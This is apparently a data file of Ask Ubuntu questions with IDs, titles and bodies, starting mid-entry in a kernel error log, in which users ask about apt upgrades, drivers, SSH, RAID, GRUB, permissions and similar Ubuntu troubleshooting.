hostname ( geoname-lookup.ubuntu.com ) jul 29 12:04:25 ubuntu ubiquity [ 10648 ] : geoname lookup for `` london '' failed : 2 can not resolve hostname ( geoname-lookup.ubuntu.com ) other errors jul 29 14:59:22 ubuntu kernel : [ 616.983294 ] squashfs error : unable to read fragment cache entry [ 26f79ee9 ] jul 29 14:59:22 ubuntu kernel : [ 616.983297 ] squashfs error : unable to read page , block 26f79ee9 , size cf29 jul 29 14:59:22 ubuntu kernel : [ 616.983302 ] squashfs error : unable to read fragment cache entry [ 26f79ee9 ] jul 29 14:59:22 ubuntu kernel : [ 616.983305 ] squashfs error : unable to read page , block 26f79ee9 , size cf29 jul 29 14:59:22 ubuntu kernel : [ 616.983309 ] squashfs error : unable to read fragment cache entry [ 26f79ee9 ] jul 29 14:59:22 ubuntu kernel : [ 616.983311 ] squashfs error : unable to read page , block 26f79ee9 , size cf29 jul 29 14:59:38 ubuntu kernel : [ 633.244836 ] fat-fs ( sdc1 ) : directory bread ( block 15262 ) failed jul 29 14:59:38 ubuntu kernel : [ 633.244846 ] fat-fs ( sdc1 ) : directory bread ( block 15263 ) failed jul 29 14:59:38 ubuntu kernel : [ 633.244850 ] fat-fs ( sdc1 ) : directory bread ( block 15264 ) failed
504058	will apt-get upgrade change the major version of a software in ubuntu lts ?	i am trying to find out how software upgrade works in ubuntu lts version . let 's say i am using ubuntu lts xx.xx . at the time of release , user can install php 5.3 and python 2.6 ( this is just an example ) . after 2 years , the available stable major release of php and python are 5.5 and 2.7 respectively ( this is also an example only ) . let 's say i run these commands in ubuntu lts : apt-get update apt-get upgrade will it upgrade the php and python version to the latest available stable major release , i.e . 5.5 and 2.7 ? or it will only upgrade to the new minor release , e.g . 5.3.2 and 2.6.3 ?
504059	why is my libre office looking like old windows office ?	i have ubuntu 12.04 and my libre office is looking just like windows office , the older one . how do i change the theme back the original one ? thank you so much
504060	intel graphics installer for linux ends with an error in ubuntu 14.04	everytime i try to install the intel graphics installer for linux it always end up with this 2 screens looking like this . and i hope anyone here can help me .
504064	my ( older ) computer has become unbootable except for ubuntu minimal cd - raid mdadm	i really hope someone can help me out here because my computer has become unbootable , and it holds a raid-5 data disk array ( mdadm ) which i need to recover . no os will boot , nor usb , nor dvd , nor hard disk installed , except for the ubuntu minimal installation cd ( dvd drive , cd+r ) which installs successfully but still my computer fails to reboot . what is different on this minimal cd ? it does gives me hope ... is there a way to recover my data from the disks ? i 'm a but reluctant to experiment on this.. my motherboard is a ga-81945gmp which i performed a cmos/ bios reset on but no result . i already did a fresh install with just one hard disk and the raid pci slots disconnected . the boot repair disk ( cd-r ) also fails to boot . thanks in advance ,
504068	how to install `requests` module for `python3` ?	i wanted to download requests : http for humans module for python3 . so i started with sudo apt-get install python3-pip sudo pip3 install requests -- upgrade there were no errors . however , when i try to import module , there are some errors : enedil @ virtualbox : ~/hacking $ python3 python 3.4.0 ( default , apr 11 2014 , 13:05:11 ) [ gcc 4.8.2 ] on linux type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import requests traceback ( most recent call last ) : file `` < frozen importlib._bootstrap > '' , line 2195 , in _find_and_load_unlocked attributeerror : 'module ' object has no attribute '__path__' during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connection.py '' , line 12 , in < module > from http.client import httpconnection as _httpconnection , httpexception importerror : no module named 'http.client ' ; 'http ' is not a package during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python3.4/dist-packages/requests/__init__.py '' , line 58 , in < module > from . import utils file `` /usr/local/lib/python3.4/dist-packages/requests/utils.py '' , line 25 , in < module > from .compat import parse_http_list as _parse_list_header file `` /usr/local/lib/python3.4/dist-packages/requests/compat.py '' , line 7 , in < module > from .packages import chardet file `` /usr/local/lib/python3.4/dist-packages/requests/packages/__init__.py '' , line 3 , in < module > from . import urllib3 file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/__init__.py '' , line 16 , in < module > from .connectionpool import ( file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connectionpool.py '' , line 36 , in < module > from .connection import ( file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connection.py '' , line 14 , in < module > from httplib import httpconnection as _httpconnection , httpexception importerror : no module named 'httplib' error in sys.excepthook : traceback ( most recent call last ) : file `` < frozen importlib._bootstrap > '' , line 2195 , in _find_and_load_unlocked attributeerror : 'module ' object has no attribute '__path__' during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 63 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 5 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 21 , in < module > from urllib.request import urlopen file `` /usr/lib/python3.4/urllib/request.py '' , line 88 , in < module > import http.client importerror : no module named 'http.client ' ; 'http ' is not a package original exception was : traceback ( most recent call last ) : file `` < frozen importlib._bootstrap > '' , line 2195 , in _find_and_load_unlocked attributeerror : 'module ' object has no attribute '__path__' during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connection.py '' , line 12 , in < module > from http.client import httpconnection as _httpconnection , httpexception importerror : no module named 'http.client ' ; 'http ' is not a package during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python3.4/dist-packages/requests/__init__.py '' , line 58 , in < module > from . import utils file `` /usr/local/lib/python3.4/dist-packages/requests/utils.py '' , line 25 , in < module > from .compat import parse_http_list as _parse_list_header file `` /usr/local/lib/python3.4/dist-packages/requests/compat.py '' , line 7 , in < module > from .packages import chardet file `` /usr/local/lib/python3.4/dist-packages/requests/packages/__init__.py '' , line 3 , in < module > from . import urllib3 file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/__init__.py '' , line 16 , in < module > from .connectionpool import ( file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connectionpool.py '' , line 36 , in < module > from .connection import ( file `` /usr/local/lib/python3.4/dist-packages/requests/packages/urllib3/connection.py '' , line 14 , in < module > from httplib import httpconnection as _httpconnection , httpexception importerror : no module named 'httplib' so , how to install requests module for python3 on ubuntu 14.04 ?
504072	an independently browseable database of large thumbnails ?	i 've googled about this for a while but to no avail . i have a huge amount of photos stored in several media and backed up in a cloud . shotwell generates pretty large thumbnails which are quite good for getting an idea of both subject and quality of a photo . the thumbnails are organized in groups based on timestamps and original folders . i 'd like to be able to browse a complete collection of the thumbnails even when the program has no access to a complete collection of the real photos ( as a matter of fact , i do n't have a complete collection of the photos in a single storage device ) . this would be very convenient to me for several reasons ; i could browse them from several pcs with differently named home folders , i could tag them according to their storage location etc . the whole collection of the thumbnails would be reasonably light and i could easily update it with rsync . however , if shotwell does n't find the actual photos , it automatically moves the corresponding thumbs under a missing pictures heading and their structure is lost . i have tried to directly import the thumbs into shotwell , but the original timestamps and tags are gone . a possible way out would be , to automate a process of thumbnail generation and of folder structure generation based on timestamps , but before getting entangled in that i thought i better ask a question here . do you know any tricks or tweaks -- or can you recommend any specific programs -- that would allow me to browse a ( huge ) collection of thumbnails without having access to the originals ? i have a sense that programs of this kind must be in use somewhere but , as i said , i could n't find out any . thanks !
504078	w540 + 14.04 + nvidia driver = no work	there 's a strange problem i can not solve : there are two lenovo w540 ( a ) and ( b ) . w540 has two graphics chips : intel and nvidia quadro k1100m . there is no bios setting to disable intel , and/or only nvidia powers external display ports - so if you want to use extenal monitor you have to use nvidia . now the problem is : i was able to install and configure nvidia on ( a ) , but i do fail using the same steps on ( b ) the first one ( a ) is mine . installation steps : 1 14.04 x86_64 installed , updated , installed xfce4 ( i do not know if that matter , but no other work was made under unity ) , 2 enabled ppa : xorg-edgers/ppa ppa , installed nvidia-340 , and disabled edgers xorg.conf created by sudo nvidia-xconfig computer booted using nvidia but only 800x600 was available and nvidia-settings did not list any card , so i checked sudo nvidia-xconfig -- query-gpu-info and updated xorg.conf with board name and busid , eg section `` device '' identifier `` nvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro k1100m '' busid `` pci:1:0:0 '' endsection after reboot hd resolution is available , external monitor works , nvidia-settings does recognize my card ( b ) was installed exactly the same steps as above ( also tried with other nvidia versions , eg those supplied with 14.04 ) but i was n't able to made nvidia-settings to see card or was n't able to get any correct display at all ( blank screen after login or even just-after-boot ) . if i replace hdd between ( a ) and ( b ) - my installation works ( so this is not hardware problem ) . my questions are : a ) what config files should i compare/copy between those two systems to make them work the same b ) if there 's no other option how to reliably clone drivers and configuration from ( a ) to ( b ) ?
504079	refused connection of ssh	i installed openssh on my new ubuntu14.04 server , turned on ssh , and enjoyed it after i finished installation . every thing was fine ; however , after just one night , i was blocked when using putty as usual . i got the message : connection refused . i rebooted the server , and i were again able to connect my server through ssh . but , after half a day , it happened again : my connection through ssh is refused . i thought some important settings might be accidentally modified , so i re-installed ubuntu 14.04 on the server . it worked at that moment but failed at the next day . i wondered if there was anything wrong on the firewall , but the firewall manager said that another server , which is one of the new servers in our lab , under the same firewall policy does not have this problem , so there should be some problems on our machine . there is no physical problem on internet , because the engineer showed me that he can ping this server through port 80 . this is confusing because the problem exists even though i re-installed the os . there is no physical problem on the internet , and the firewall policy does not block other servers from my ip . are there any ssh variables or system settings that i should check ?
504080	will i be able to use my ntfs data partition in ubuntu ?	my machine is currently running windows 7 . i have 2 partitions : os ( c : ) and data ( d : ) . i intend to do a native ubuntu 14.04 install . assuming i format my windows os partition , will i have full access to my d partition in ubuntu ?
504084	wireless connection repeatedly disconnects , strong signal	the wireless connection on my dell inspiron 9100 repeatedly disconnects , especially when i try to access a weblink . http : //pastebin.ubuntu.com/7894056/
504087	ca n't type caret ( '^ ' ) in konsole	i can obviously type it my browser and even in xterm , but not in konsole . i 'm using kubuntu , 13.10 . to be thorough , i am using a german keyboard ( which is already a pain ) , but i do n't see why that should matter . in konsole , i can type the other character ( '째 ' ) on the same key . i use this all the time in vim and it 's annoying to copy and paste it . i saw something similar here , but it was n't solved . one of the answers asked if the problem was reproduced in kate ; it is . i could use another terminal emulator , i guess , but it would be nice to use konsole .
504088	change installation path / move programs	i am using a 120gb ssd and a 1tb hdd . i created ubuntu ( home directory , etc . ) on the ssd and stored some data ( music , photos ) on the hdd . sadly the ssd is now full because of my games and programs . i searched to change the installation path of games or programs or to move some of them to the hdd but this seems to be impossible ( without slowing it or some programs not working because they look for a specific library path ) . i know that i can move my whole home folder to the hdd but this will slow my system . i read that ubuntu does n't have a c : /programs folder like windows and in ubuntu the files are splitted on their purpose ( all libraries in one folder , all executable in another.. etc. ) . so is there a way to free up space beneath uninstalling programs ? maybe the mount process described here could help ? i am fairly new to ubuntu , so which folder could i mount and how to do this ? what exactly does it do ? additional : if i try to add another directory for steam ( for my games ) only the ssd gets shown and i ca n't toggle the view to get my hdd shown . beneath that i could change the directory spotify downloaded its music to the hdd .
504093	locally integrated menus ( menus in title bars ) only working selectively	i upgraded to 14.04 and enabled locally integrated menus . however , they seem to work on a randomly selective basis . i 've tried a few applications out - firefox and libreoffice work , but terminal and nemo do not : what 's going on ? how can i get the latter to integrate as per the former ?
504094	how to login with non root user on chromebook	i recently bought a chromebox and followed the steps in this video to install ubnutu via crouton . once i logged into ubuntu i logged out again , which brought me back to the chromeos . i hit ctrl+alt+t to bring up the command screen , but do n't know how to log back in with the username i created . i have been doing the following to log in sudo enter-chroot sudo startxfce4 which allows me to login as root , which is n't ideal since i want to use chromium browser . i have no gui to log in either and chrome keeps starting in developer mode . i have been searching and reading for hours and everything tells me how to login as root/superuser which is not what i want to accomplish .
504099	deactivate `` recent files '' in dolphin	i want to deactivate the `` recent files '' in the sidebar of dolphin . is there a way ?
504105	upgraded to 14.04 - ca n't see system files in nautilus	i just upgraded from 12.04 lts to 14.04 lts . upgrade went smoothly . but some things have changed . i run bare bones gnome ( metacity ? ) and now in nautilus , i can not navigate to the file system - ca n't get out of home . even if i call sudo nautilus from a terminal it 's the same . in 12.04 i could always navigate to the file system and manage files there with sudo nautilus . how do i fix this ? here is what nautilus looks like now : in 12.04 , on the left side of home was an icon that send me to the file system - no more . i need it back .
504106	aver media a850 under ubuntu 14	i am familiar with the gui interface but am a reluctant user of terminal for lots of reasons . i can see my device listed when i run lsusb , but when i run dmesg i get loads of pages of stuff and ca n't see my device . the following i have cut and pasted from linuxhardware : the dvb-t usb stick avermedia avertv volar black hd a850 has the usb id 07ca:850a : $ lsusb bus 002 device 002 : id 07ca:850a avermedia technologies , inc the stick is supported under linux since at least the kernel version 2.6.28 ( ubuntu 9.10 karmic ) by the kernel module dvb_usb_af9015 . a firmware file has to be installed to operate the the . this firmware file is part of the ubuntu package linux-firmware-nonfree : sudo apt-get install linux-firmware-nonfree the module loads automatically if the stick is plugged in : $ dmesg dvb-usb : found a 'avermedia avertv volar black hd ( a850 ) ' in warm state . dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . dvb : registering new adapter ( avermedia avertv volar black hd ( a850 ) ) af9013 : firmware version:4.65.0 dvb : registering adapter 0 frontend 0 ( afatech af9013 dvb-t ) i have found the dvb-usbaf9015.fw firmware but it says it is a bin file and when i look up how to install bin files the nearest is installing ivtv which is not what i want . i think i am very close but just need some advice as to how to load the *.fw file .
504107	problem with mergelist	suddenly , my ubuntu reports an error and no longer does updates because of this error . the error seems to be the following : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened . it seems that this prevents me from doing everything . apt-get stops with an error , synaptics manager also , and so on and so forth . any solutions out there ? thanks , jim
504112	apt-get will not shut off after failed install of app	system will not update nor can i install/remove application because the application apt-get will not release the process . rebooting the laptop does not resolve this matter . i 'm very new to this os and still find myself fumbling around to self fix issues . i get the following error : error when attempting to an update of system using the gui ... . not all updates can be installed ... . recommend to do a partial update which i do and get the next error ... . unable to get exclusive lock this usually means that another package management application ( like apt-get or aptitude ) already running . please close that application first . this all started when i was attempting to install apps for netflix to run per instructions found here the last command that was executed was sudo apt-get install pipelight-multi which installed then presented text licencing agreement and ok at the bottom . clicking on ok with the mouse pointer or pressing the enter button did not get past this screen . in frustration , i closed the terminal program . which leads me to the area i am at now . per musher 's request to input the following into terminal and post ( ps aux | grep -i apt ) root 6734 0.0 0.0 7628 880 ? s jul28 0:00 sudo apt-get install pipelight-multi root 6735 0.0 0.1 35840 1332 ? s jul28 0:05 apt-get install pipelight-multi root 6792 0.0 0.0 55328 848 pts/2 ss+ jul28 0:02 /usr/bin/dpkg -- status-fd 44 -- unpack -- auto-deconfigure /var/cache/apt/archives/libunistring0_0.9.3-5_i386.deb /var/cache/apt/archives/libgettextpo0_0.18.1.1-5ubuntu3_i386.deb /var/cache/apt/archives/libmpg123-0_1.12.1-3.2ubuntu1_i386.deb /var/cache/apt/archives/libodbc1_2.2.14p2-5ubuntu3_i386.deb /var/cache/apt/archives/cabextract_1.4-1_i386.deb /var/cache/apt/archives/ttf-mscorefonts-installer_3.4ubuntu3_all.deb /var/cache/apt/archives/wine-compholio-i386_1.7.23~ubuntu12.04.1_i386.deb /var/cache/apt/archives/wine-compholio_1.7.23~ubuntu12.04.1_i386.deb /var/cache/apt/archives/libcapi20-3_1 % 3a3.12.20071127-0ubuntu11_i386.deb /var/cache/apt/archives/libosmesa6_8.0.4-0ubuntu0.7_i386.deb /var/cache/apt/archives/mesa-utils_8.0.1+git20110129+d8f7d6b-0ubuntu2_i386.deb /var/cache/apt/archives/pipelight-multi_0.2.7.1~ubuntu12.04.1_i386.deb root 8670 0.8 2.3 59116 24084 ? sn 06:10 0:27 /usr/bin/python /usr/sbin/aptd root 9751 0.0 0.6 15180 6928 ? s 06:31 0:00 /usr/bin/python /usr/share/apt-xapian-index/update-apt-xapian-index-dbus libby 10203 0.0 0.0 4392 848 pts/4 r+ 07:02 0:00 grep -- color=auto -i apt
504119	14.04.1 on dell vostro 14 3445 ?	i wanted to install 14.04.1 on my laptop , my question is about drivers . i got all the drivers downloaded but they are for windows 8.1 and the official dell site does n't provide them for ubuntu . my laptop got an amd r2 graphics card and other things like bluetooth , wireless and a camera . are the drivers pre installed in ubuntu , if not how can i get and install them ?
504124	chrome crashing too often in ubuntu 14.04	ever since i upgraded to ubuntu 14.04 , chrome ( google-chrome-stable ) crashes a lot more often than before . i do keep several tabs open ( > 20 ) , but they are all light ( no multimedia ) and have never caused any problems in the past . the processor and memory use are is pretty low when the browser becomes unresponsive and the whole system is still usable . is there an easy fix ? where can i find more logs for a more complete diagnostic ?
504125	can not upgrade from 12.04 using update manager	is there a special method to upgrade from 12.04 to 14.04 ? when i try to upgrade from 12.04 using update-manager -d i receive the following error message : fetching upgrade failed . there may be a problem with the server . am i missing any steps ? does anybody have a solution for this ? followed guidance on ubuntu website for upgrading to 14.04 . i read it to say that each release after 12.04 had to be installed subsequent to installing next release to finally get 14.04 installed . did not understand that un-supported releases are moved to a different server and are essentially unusable , hence the error message that i received .
504127	which file or directory dose `` apt-get update '' affect	i have updated my system and i want to do some tests needed to remove the cache . i know the command download the packages list from the repositories , but where is the local database to store this infomation .
504132	grub repair issue - duplicate ubuntu and no windows	i tried to repaid grub via boot-repaid and these are the results : http : //paste.ubuntu.com/7894957/ currently i have two ubuntus listed ( but they boot into the same system ) and the windows disappeared . could someone please help me ? i 'm not experienced with linux . thank you !
504133	latest linux systems constantly freezing	before i begin , i should clarify that this issue does not happen only with ubuntu 14.04 , but with elementary os luna and debian 7 as well . to make the story short , debian froze from the installation part . same with elementary , which i could not even get installed . i managed to install ubuntu 14.04 , but it froze about a minute after booting . no matter how many times i tried , i get freezing ( ca n't move mouse or use the keyboard at all ) . previously i 've been using ubuntu gnome 13.04 on gnome classic mode ( not gnome 3 ) , something like fallback . i 've tried using gnome3 but i kept getting freezing . just in case , i also have win7 installed , which i 'm using now , with no problems ; temperatures are great , computer is super clean from dust ) i 've also heared about an issue on kernel version 3.0.0 , updated but still no solution to the problem . my belief is that it 's time to get a new computer , but first , let me share my computer specifications : cpu : amd athlon 64 x2 dual core 2.2 ghz ram : 4 gb ddr2 gpu : nvidia geforce 240 hdd : 500 gb seagate barracuda 7200 rpm
504136	lmms 1.0.2 midi recdording noise	ask shown here , the midi works well before recording . after recording , there is noise . how do i fix this ?
504139	radeon driver hd 6470m on ubuntu 14.04 lts	couple weeks ago my ubuntu 12.04 lts was unable to start and wanted automatically update to 14.04 lts . all other programs and software i was able to fix and update but i cant find the way to set up my radeon drivers hd 6470m . only catalyst 14.6 beta sounds reasonable . i have only this kind of screen on my system setting as this : so any tips what to do now ?
504140	scanning a folder for new files , and then running them trough cuckoo	i want to create a folder , where i throw in all the malwares i discover . in that folder , i want to run a script that recognize a new file ( the malware ) and when he discovers a new file , he will submit it to cuckoo ( i guess the end result should be python submit.py /path/to/file ) . after the cuckoo scan , the result template is saved to a different folder . i would like to get the result to my email ( so again , to run a script in the result folder , and when there is a new result - it will send it to my email ) .
504143	reboot and starting issues	i installed ubuntu correctly and it did everything , but after startup it showed the background picture ( no icons at all though ) for about 20-30 minutes , then it showed `` ubuntu '' for 20-30 minutes , then went black for 5 minutes , then showed the content in this picture . what 's the problem ? also while typing this , after a while ubuntu told me i was running on low graphics card , so i chose use low graphics and now its a black screen with an underscore blinking ...
504145	disk monitor software	ca n't find something similar to windows resource monitor software ( input output monitor ) . i need tool which draws disk load graphic and processes which uses disk input or output . there are a lot of console alternatives ( iotop ) , but they are not comfortable to use ( i ca n't quickly kill process , copy name of process , look at the graph , they need root access etc. ) . is there are gui alternative to this ? ( on screenshot )
504146	14.04 doesnt boot after upgrading from 12.04	i had installed ubuntu 12.04 with windows 8.1 . it was perfectly working , until i upgraded to 14.04 , the process was quite slow , and it does n't boot anymore . it says , mount : mounting/dev/loop0 on/root failed : invalid argument mount : mounting/dev on/root/dev failed : no such file or directory mount : mounting/sys on/root/dev failed : no such file or directory mount : mounting/proc on/root/proc failed : no such file or directory target file system doesnt have requested /sbin.init . no init found . try passing init=bootarg . busy box v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands.. ( initramfs )
504150	chrome on xubuntu 14.04 wo n't display simplified chinese characters	do n't know if anybody else is having the same issue , and have a solution to this , but here are the steps to re-create the issue : install xubuntu 14.04 install chrome everything works fine at this point run sudo apt-get update & & sudo apt-get upgrade ( as of 27 july 2014 ) some simplified chinese characters wo n't display . it appears only the ones that are different between simplified and traditional chinese characters are not displaying . a screenshot of wikipedia 's multilingual help page : edit : note that only chrome is affected after running sudo apt-get & & sudo apt-get upgrade . firefox and everything else is still displaying the correct characters .
504151	how to prevent directory from being deleted by user ?	suppose a directory dir1 is created by sudo on desktop . sudo mkdir dir1 then i applied chown and chmod as following : sudo chown root : root dir1 sudo chmod go-rwx dir1 now dir1 is only accessible with owner root . $ ls -ld dir1 drwx -- -- -- 2 root root 4096 jul 29 19:21 dir1 if user ( $ user = pandya ) try to delete dir1 with gui nautilus ( without sudo ) , then he ca n't which is ok . but if tried to remove with terminal then he can which is not ok : - rm -r ( without sudo ) : $ rm -r dir1 rm : descend into write-protected directory ‘dir1’ ? y rm : remove write-protected directory ‘dir1’ ? y $ and more easily with rmdir ! ( without sudo ) : $ rmdir dir1 $ thus , how to prevent dir1 to be delete with user than not sudo ? [ optional ] my ultimate aim is : only owner can delete directory , group and other only can read/execute .
504154	google chrome icon is fuzzy/blurry in docky	as the question says , the chrome icon is fuzzy in docky . i tried this : how get a higher resolution icon for google chrome in docky ? but that did n't seem to help . i would have commented my issue there , but i need rep. points for that . any help would be greatly appreciated .
504158	public ip and ifconfig ip are different : how to connect my computer to internet	i have set an home webserver with my application running . my machine runs ubuntu 14.04 lts and i tested it to be working within the devices connected to that router . i also found the ip address that is assigned to the router for internet and port forwarding is working . when i type the ip address it opens the apache webserver index.html http : //192.168.1.4/ -- - ip address assigned by the router = works . http : //10.1.10.149/ -- - ip address assigned to the router = works with port forwarding my ip address when i use http : //whatismyipaddress.com/ -- -- - 129.217.129.129 how do i find my webserver in the internet .
504166	ls2208 barcode scanner	i have a computer running lubuntu 14.04 with a symbol ls2208 barcode scanner attached . it scans fine most of the time , but has an irregular problem scanning codabar barcodes in web apps . it will sometimes randomly leave out one number in the middle of the barcode string . it is not always the same position , and the same barcode can sometimes work and sometimes not . the problem only occurs on my lubuntu computer , not on my windows computer . the problem happens when i scan barcodes into a variety of dialog boxes in a web browser ( not all the same webapp ) . the problem seems to be specific to the machine and/or os , not to a specific webapp . any hints on what i can do to fix this ?
504168	i am unable to copy any file completely , it copies some portions and then it just stays there	i run an acer aspire 481p laptop with 8gb ram and ubuntu 14.04 running on it , when i try to copy any file to an external memory ( flashdrive or ehdd ) it copies some portion of the file and then just stays there without any progress .
504170	gnome client-side decorations persist after removing gnome	i have completely removed gnome 3.12 , all gnome shell extensions , any extra applications , etc . from ubuntu 14.04 and then reinstalled unity . after rebooting i still see the characteristic client-side decorations : i uninstalled gnome by following the instructions in this thread . how can i go back to the regular ubuntu window decorations ?
504171	`` attributeerror : 'nonetype ' object has no attribute 'group ' '' when trying to use youtube-dl	the error comes in a statement like this warning : automatic signature extraction failed : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/youtube_dl/extractor/youtube.py '' , line 957 , in _decrypt_signature video_id , player_url , len ( s ) file `` /usr/lib/python2.7/dist-packages/youtube_dl/extractor/youtube.py '' , line 331 , in _extract_signature_function player_type = id_m.group ( 'ext ' ) attributeerror : 'nonetype ' object has no attribute 'group' warning : warning : falling back to static signature algorithm any sort of help is greatly appreciated .
504174	raid wo n't mount after reboot	i 'm building a new ubuntu 14.04 server with raid . i partitioned the operating system and swap partition on a small harddrive and have the raid strictly for files . after adding a new disc to the raid , it now wo n't let me mount it . guy @ server : ~ $ sudo mountall swapon : /dev/disk/by-uuid/ab5617d1-58e1-4013-9690-64679982b2cf : swapon failed : device or resource busy mountall : swapon /dev/disk/by-uuid/ab5617d1-58e1-4013-9690-64679982b2cf [ 1823 ] terminated with status 255 mountall : problem activating swap : /dev/disk/by-uuid/ab5617d1-58e1-4013-9690-64679982b2cf here 's my fstab : # / was on /dev/sda1 during installation uuid=d24a5068-14fb-4cec-831a-4b6d3bdba44d / ext4 errors=remount-ro 0 1 /dev/mapper/vg -- raid-lv -- raid /pangolin ext4 defaults 0 2 # swap was on /dev/sda5 during installation uuid=ab5617d1-58e1-4013-9690-64679982b2cf none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 and the output of mdadm -- examine /dev/sda1 /dev/sda1 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : c091b97c:00578039 : f0b8ae04 : c6b0c1a8 name : pangolin:0 ( local to host pangolin ) creation time : tue jan 25 16:11:29 2005 raid level : raid5 raid devices : 4 avail dev size : 1953259520 ( 931.39 gib 1000.07 gb ) array size : 2929887744 ( 2794.16 gib 3000.21 gb ) used dev size : 1953258496 ( 931.39 gib 1000.07 gb ) data offset : 262144 sectors super offset : 8 sectors state : clean device uuid : 4aa877c8 : b7187071:2237883c : c0bf754d update time : thu jul 24 16:59:25 2014 checksum : 24f84274 - correct events : 276 layout : left-symmetric chunk size : 512k device role : active device 0 array state : aaaa ( 'a ' == active , ' . ' == missing ) any help understanding what 's going on would be appreciated . edit : okay , i feel dumb . i just had to stop the array , and then reassemble it , and then do mountall .
504175	upgrade 14.04 with errors	i upgrade from 13.10 to 14.04 . i got computer not stable and upgrade aborted and recover to old version , but i let it continue to complete . it says upgrade complete with errors . it did not process clean up and i checked about this computer it says ubuntu 14.04 after i reboot the computer , it shows ubuntu 14.04 lts , it seems that i completed the update . my question is the update the message confuse me , it looks like the update with errors and aborted , but at the end it shows that it is 14.04 . i am not sure which version i have right now . if i am on 14.04 , how about those errors during update how i can know what were the errors and how i can fix those errors during upgrade ? your help and information is great appreciated , iccsi
504177	how can i install yed graph editor on ubuntu ?	yed is a feature rich editor for hierarchical diagrams and flow charts . i would like to install it on ubuntu . unfortunately it does n't appear to be available in the official repositories . what steps would i have to follow to install yed on ubuntu ?
504181	how to set default search engine in browser ?	i really need to download a form/schedule from the university where i study , but for some strange reason this is not possible . rekonq tells me : *oops ! can not load http : //webred.sdu.dk/sitecore/shell/controls/rich text editor/~/media/bd12f00670a84ada974fa70cd3e01b19.pdf webred.sdu.dk : socket operation timed out you do not have a default search engine set . we will not suggest you one . consult a cached snapshot of the site : try checking the wayback machine or the google cache . * can someone tell me if it is possible to change the set up of the browser in order to download it ? this here is the website from where i have to downloade - sdu is a danish university : www.sdu.dk i need to download/press the number 8 . blanket til forh책ndstilmelding can someone tell me is it an impossible task ? if not everyone is welcome to e-mail me with file - i would be very happy and apreciate it a lot .
504183	codeblocks set up ?	hi i am looking to set up code blocks ide to dev c++ . i have installed it and used it to do a first hello world app . i tried to compile and run but it has a debugger and what appears to a link issue . when i first started the first cpp test.cpp project it asked me what compiler and it detected the gnu which i selected . do i need to download anything from the repository ? do i need to link anything in my build options that is n't done automatically ? i am a new ubuntu user . started c++ in windows using code blocks and like the open source environment of linux and would like to play in the big kids sandbox .
504184	command for going from chrome to chrubuntu	i installed chrubuntu onto my acer c720 three times . each time it reverts to only opening to chrome even if i put in control l. i have to reinstall chrubuntu . it works for a while but then starts only opening to chrome . does any command to get it back to ubuntu from chrome ?
504185	how to implement the functions which are defined inside the conio.h	i wanted to use the conio.h header file in one of my c codes but as we know the header file is not available for unbuntu , what should we do if we want to implement the functions if the header file conio.h , like getch ( ) , getche ( ) etc .
504188	microphone on combo jack not working asus a46cm	my laptop asus a46cm has a microphone/headphone combo jack . i try to attach my samsung earphone that has a microphone on it , but the microphone not working , ubuntu still use the laptop microphone with very bad noise . on windows the microphone working well , how to fix this on ubuntu ?
504189	setting & saving bookmarks on a video timeline	i have used openshot or better still flowblade in order to trim my videos say to get rid of advertisements but perhaps back in windows era i was too fond of solveigmm video splitter that i found any linux video editor too bloated for my usage now i am hoping to circumvent this problem in a three step procedure : setting bookmarks on any video timeline ( say by using markers ... ) & saving those timestamps to a txt or xml file . a bash script can format those time stamps into one-liners such as : 00:45:56 00:58:04 01:10:16 01:50:50 .. the above file of coarse will contain even number of lines representing pairs or single segment which can then be fed to ffmpeg -ss < line1 > -to < line2 > -c : v copy -c : a copy ..i will n't go to further details separate files thus generated can then be easily concatenated using ffmpeg -concat < files > -c copy ensuring no rencode thus saving time & guaranteeing quality now i do have clue to the last two steps but can i find a gui application for my first step ( remember the old days of vcd cutter by jiao ) . i hope there is something out there i may have skipped
504190	how to force restart of a dependent service in upstart ?	i have an upstart file for running a docker container : description `` start a worker '' start on filesystem and started docker stop on stopping docker respawn script /usr/bin/docker start -a my_worker end script when i restart docker : initctl restart docker the container service does not restart . i tried to remove the dependency on filesystem : start on started docker and it worked , the container service got restarted after the restart of docker . is there a clean way to have this behaviour without sacrificing the depenency on filesystem , i.e . can you restart a service , when only one of the dependent services is restarted ?
